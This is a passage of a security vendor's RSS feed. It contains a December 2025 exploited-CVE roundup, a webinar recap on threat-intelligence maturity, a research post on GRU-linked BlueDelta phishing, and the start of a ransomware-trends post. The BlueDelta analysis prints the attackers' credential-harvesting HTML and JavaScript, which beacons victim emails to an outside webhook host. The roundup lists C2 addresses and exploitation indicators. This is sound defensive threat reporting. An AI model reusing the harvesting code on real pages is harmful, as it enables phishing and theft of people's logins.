            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMtKwC/overview">CVE-2025-55182</a></div>
            <div>99</div>
            <div>Meta React Server Components</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div><a href="https://github.com/search?q=CVE-2025-55182&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBRk_r0/overview">CVE-2025-66644</a></div>
            <div>99</div>
            <div>Array Networks ArrayOS AG</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div>No</div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4U81/overview">CVE-2025-48572</a></div>
            <div>99</div>
            <div>Google Android</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4lfv/overview">CVE-2025-48633</a></div>
            <div>99</div>
            <div>Google Android</div>
            <div>Insufficient Information</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaz1-z/overview">CVE-2025-59718</a></div>
            <div>99</div>
            <div>Fortinet Multiple Products</div>
            <div>CWE-347 (Improper Verification of Cryptographic Signature)</div>
            <div><a href="https://github.com/search?q=CVE-2025-59718&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBa2HBm/overview">CVE-2025-59719</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-347 (Improper Verification of Cryptographic Signature)</div>
            <div><a href="https://github.com/moften/CVE-2025-59718-Fortinet-Poc">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaZM-R/overview">CVE-2025-62221</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMhTQJ/overview">CVE-2025-8110</a></div>
            <div>99</div>
            <div>Gogs</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBgciBg/overview">CVE-2025-14174</a></div>
            <div>99</div>
            <div>Google Chromium</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/zeroxjf/CVE-2025-14174-analysis">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBhnuhP/overview">CVE-2025-14611</a></div>
            <div>99</div>
            <div>Gladinet CentreStack and Triofox</div>
            <div>CWE-798 (Use of Hard-coded Credentials)</div>
            <div><a href="https://github.com/pl4tyz/CVE-2025-14611-CentreStack-and-Triofox-full-Poc-Exploit">Yes</a></div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBsdjtE/overview">CVE-2025-59374</a></div>
            <div>99</div>
            <div>ASUS Live Update</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBtm5Fw/overview">CVE-2025-20393</a></div>
            <div>99</div>
            <div>Cisco Multiple Products</div>
            <div>CWE-20 (Improper Input Validation)</div>
            <div><a href="https://github.com/search?q=CVE-2025-20393&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0AQ0/overview">CVE-2025-43529</a></div>
            <div>99</div>
            <div>Apple Multiple Products</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5RY_KG/overview">CVE-2025-40602</a></div>
            <div>99</div>
            <div>SonicWall SMA1000 appliance</div>
            <div>CWE-250 (Execution with Unnecessary Privileges)</div>
            <div>No</div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBw5PCQ/overview">CVE-2025-14733</a></div>
            <div>99</div>
            <div>WatchGuard Firebox</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBx5LcP/overview">CVE-2025-14847</a></div>
            <div>99</div>
            <div>MongoDB and MongoDB Server</div>
            <div>CWE-130 (Improper Handling of Length Parameter Inconsistency)</div>
            <div><a href="https://github.com/search?q=CVE-2025-14847&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/t9VBl0/overview">CVE-2023-52163</a></div>
            <div>99</div>
            <div>Digiever DS-2105 Pro</div>
            <div>CWE-862 (Missing Authorization)</div>
            <div>No</div>
          </div>
          <div>
            <div>18</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/Z2-Qcf/overview">CVE-2018-4063</a></div>
            <div>99</div>
            <div>Sierra Wireless AirLink ALEOS</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BA5mEyi/overview">CVE-2025-58360</a></div>
            <div>99</div>
            <div>OSGeo GeoServer</div>
            <div>CWE-611 (Improper Restriction of XML External Entity Reference)</div>
            <div><a href="https://github.com/search?q=CVE-2025-58360&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/7KUyzy/overview">CVE-2025-6218</a></div>
            <div>99</div>
            <div>RARLAB WinRAR</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-6218&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/neGcOR/overview">CVE-2022-37055</a></div>
            <div>99</div>
            <div>D-Link Routers</div>
            <div>CWE-120 (Classic Buffer Overflow)</div>
            <div>No</div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/hzmZuu/overview">CVE-2021-26828</a></div>
            <div>99</div>
            <div>OpenPLC ScadaBR</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div><a href="https://github.com/search?q=CVE-2021-26828&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in December 2025</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Fortinet</strong> continued vulnerability concerns with two critical authentication bypass flaws</li>
          <li><strong>Google</strong> faced three vulnerabilities across Android (2) and Chromium (1) platforms</li>
          <li><strong>Microsoft</strong> dealt with a Windows kernel use-after-free vulnerability</li>
          <li><strong>Meta</strong> experienced the month's most impactful vulnerability with React2Shell</li>
          <li>Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-22</strong> – Path Traversal</li>
          <li><strong>CWE-347</strong> – Improper Verification of Cryptographic Signature</li>
          <li><strong>CWE-416</strong> – Use After Free</li>
          <li><strong>CWE-434</strong> – Unrestricted Upload of File with Dangerous Type</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong><a href="https://www.recordedfuture.com/ko/blog/critical-react2shell-vulnerability">React2Shell exploitation</a></strong> <strong>dominated December’s CVE activity:</strong></p>
        <ul>
          <li><strong>Threat actors observed to have exploited this vulnerability:</strong>
            <ul>
              <li><strong>China-nexus actors</strong> Earth Lamia and Jackpot Panda</li>
              <li><strong>China-linked clusters</strong> UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595</li>
              <li>North Korea-linked and financially motivated groups</li>
            </ul>
          </li>
          <li><strong>Observed payloads</strong> included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)</li>
          <li><strong>Infrastructure connections</strong> to HiddenOrbit relay infrastructure and GobRAT relay component</li>
        </ul>
        <p><strong>Additional activity:</strong></p>
        <ul>
          <li><strong>UAT-9686</strong> exploited Cisco Secure Email Gateway (<strong>CVE-2025-20393</strong>), deploying AquaShell, AquaPurge, and AquaTunnel</li>
          <li><strong>Unknown actors</strong> leveraged Gogs vulnerability (<strong>CVE-2025-8110</strong>) for Supershell malware deployment</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed widespread exploitation.</p>
        <h3>CVE-2025-55182 | Meta React Server Components (React2Shell)</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added December 5, 2025</p>
        <p><strong>Why this matters:</strong> Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.</p>
        <p><strong>Affected versions:</strong></p>
        <ul>
          <li>React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)</li>
          <li>Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77</li>
          <li>Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin</li>
        </ul>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately</li>
          <li>Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5</li>
          <li>Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints</li>
          <li>Check logs for E{"digest" error patterns indicating exploitation attempts</li>
          <li>Review server processes for unexpected Node.js child processes</li>
        </ul>
        <p><strong>Exposure:</strong> ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c78e7d8c6ef475aeadada64b85462a8f66332e7c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h3>CVE-2025-20393 | Cisco Secure Email Gateway</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by UAT-9686</p>
        <p><strong>Why this matters:</strong> Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.</p>
        <p><strong>Affected products:</strong> Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Cisco's security updates immediately</li>
          <li>Monitor Spam Quarantine web interface access logs</li>
          <li>Check for modifications to <code>/data/web/euq_webui/htdocs/index.py</code></li>
          <li>Hunt for AquaShell, AquaPurge, and AquaTunnel indicators</li>
          <li>Review outbound connections to suspicious IPs</li>
        </ul>
        <p><strong>Known C2 infrastructure:</strong> 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Practitioners Reveal What Makes Threat Intelligence Programs Mature]]></title>
            <link>https://www.recordedfuture.com/ko/blog/practitioner-insights-advancing-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/practitioner-insights-advancing-threat-intelligence</guid>
            <pubDate>Fri, 09 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat intelligence practitioners from Global Payments, Adobe, and Superhuman reveal how mature CTI programs transform data overload into strategic business value. Learn proven approaches to automation, cross-functional collaboration, and executive communication.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Intelligence drives better decisions.</strong> High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.</li>
          <li><strong>Maturity means efficiency.</strong> Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.</li>
          <li><strong>Information overload is the top challenge.</strong> Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.</li>
          <li><strong>AI will reshape the analyst role.</strong> While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.</li>
        </ul>
        <p>Recorded Future recently hosted two webinars to unpack key insights from the <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">2025 State of Threat Intelligence Report</a> and hear directly from customers who are putting these findings into practice.</p>
        <p>Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.</p>
        <p>But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.</p>
        <h2>Intelligence as a strategic asset</h2>
        <p>Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”</p>
        <p>Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”</p>
        <p>Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”</p>
        <h2>How threat intelligence delivers organization-wide value</h2>
        <p>Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.</p>
        <p>Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”</p>
        <p>Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”</p>
        <p>Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”</p>
        <h2>The anatomy of a mature threat intelligence program</h2>
        <p>According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.</p>
        <p>“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.</p>
        <p>Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”</p>
        <h2>Pathways to advancing maturity</h2>
        <p>Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”</p>
        <p>Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”</p>
        <h2>Top challenges for CTI teams</h2>
        <p>The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”</p>
        <p>Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.</p>
        <h2>Looking to the future of threat intelligence</h2>
        <p>When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.</p>
        <p>Watch the recordings of the <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/8812722f-c797-43e5-8959-dafb91973948">North America</a> and <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/cd895838-6b18-4d3e-8d02-16287ee95642">EMEA</a> webinar sessions to learn more, and <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">download the 2025 State of Threat Intelligence Report</a> to see how your peers are evaluating, investing in, and operationalizing threat intelligence.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1c3dce156d3f3b159e439a8f8b07b4b731d9082a8.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GRU-Linked BlueDelta Evolves Credential Harvesting]]></title>
            <link>https://www.recordedfuture.com/ko/research/gru-linked-bluedelta-evolves-credential-harvesting</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/gru-linked-bluedelta-evolves-credential-harvesting</guid>
            <pubDate>Wed, 07 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group reveals how GRU-linked BlueDelta evolved credential-harvesting campaigns targeting government, energy, and research organizations across Europe and Eurasia.]]></description>
            <content:encoded><![CDATA[
        <p><em>The analysis cut-off date for this report was September 11, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 <a href="https://www.recordedfuture.com/ko/research/bluedeltas-persistent-campaign-against-ukrnet">report</a>.</p>
        <p>Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.</p>
        <p>BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.</p>
        <p>BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.</li>
          <li>The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.</li>
          <li>Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.</li>
          <li>BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.</li>
          <li>Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.</li>
        </ul>
        <h2>Background</h2>
        <p>BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.</p>
        <p>Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.</p>
        <h2>Technical Analysis</h2>
        <p>Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.</p>
        <h3>Microsoft OWA Credential Harvesting</h3>
        <p>On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in <strong>Figure 1</strong>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dd2f28cbdc733be6383fcbe909dac08761bf2bb0.png?width=750&amp;format=png&amp;optimize=medium" width="1372" height="809" />
            </div>
          </div>
          <div>
            <div><strong>Figure 1:</strong> OWA login-themed credential-harvesting page (Source: Recorded Future)</div>
          </div>
        </div>
        <p>BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL <em>hxxps://shorturl[.]at/Be4Xe</em>. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL <em>hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7</em>. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.</p>
        <p>The initial webhook in this campaign differs from those previously reported by Inskit Group; instead of hosting the credential-harvesting page, it uses HTML to load a PDF lure document into the victim's browser for two seconds before redirecting to a second webhook, as per <strong>Figure 2</strong>.</p>
        <div>
          <div>
            <div>
              <pre><code>&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset="utf-8" /&gt;
        &lt;meta name="viewport" content="width=device-width"&gt;
        &lt;meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4"&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"&gt;&lt;/object&gt;
  &lt;/body&gt;
&lt;/html&gt;
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 2:</strong></em> <em>HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)</em></p>
        <p>The PDF lure document, shown in <strong>Figure 3</strong>, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a7e9f590d762d7e489a243d9e12bcccb33d79463.png?width=750&amp;format=png&amp;optimize=medium" width="864" height="913" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL <em>hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4</em>, which hosts a spoofed OWA login page as shown in <strong>Figure 1</strong>. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.<br /><br />As shown in <strong>Figure 4</strong>, BlueDelta has added a new hidden HTML form element used to store the current page's URL. The HTML element is populated using JavaScript at page load, as shown in <strong>Figure 5,</strong> and is later used to capture victim information when the page opens and credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need for manual addition of the exfiltration URL to credential-harvesting pages.</p>
        <div>
          <div>
            <div><code>&lt;input type="hidden" id="href" name="href" role="textbox" aria-labelledby="userNameLabel" value="hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4"&gt;&lt;/div&gt;</code></div>
          </div>
        </div>
        <p><em><strong>Figure 4:</strong></em> <em>Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)</em></p>
        <div>
          <div>
            <div>
              <pre><code>&lt;script&gt;
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;

var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
&lt;/script&gt;
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 5:</strong></em> <em>JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future</em>)</p>
        <p>The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “<code>u=</code>” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to <code>/owa/</code> to imitate a legitimate OWA login page.<br /><br />When the HTML form is submitted, a JavaScript function named <code>myFunction</code> captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in <strong>Figure 6</strong>.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_13adafe204e74a6a3976247e1c12b0466f536b86e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[New ransomware tactics to watch out for in 2026]]></title>
            <link>https://www.recordedfuture.com/ko/blog/ransomware-tactics-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/ransomware-tactics-2026</guid>
            <pubDate>Mon, 05 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Ransomware groups made less money in 2025 despite a 47% increase in attacks, driving new tactics: bundled DDoS services, insider recruitment, and gig worker exploitation. Learn the emerging trends defenders must prepare for in 2026.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.</li>
          <li>Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.</li>
          <li>Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.</li>
        </ul>
        <h2>The ransomware paradox: More attacks, less money</h2>
        <p>By most accounts, ransomware groups <a href="https://www.coveware.com/blog/2025/10/24/insider-threats-loom-while-ransom-payment-rates-plummet"></a><a href="https://www.coveware.com/blog/2025/10/24/insider-threats-loom-while-ransom-payment-rates-plummet">made less money</a> in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to <a href="https://www.recordedfuture.com/ko/products/threat-intelligence"></a><a href="https://www.recordedfuture.com/ko/products/threat-intelligence">Recorded Future Intelligence</a>, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.</p>
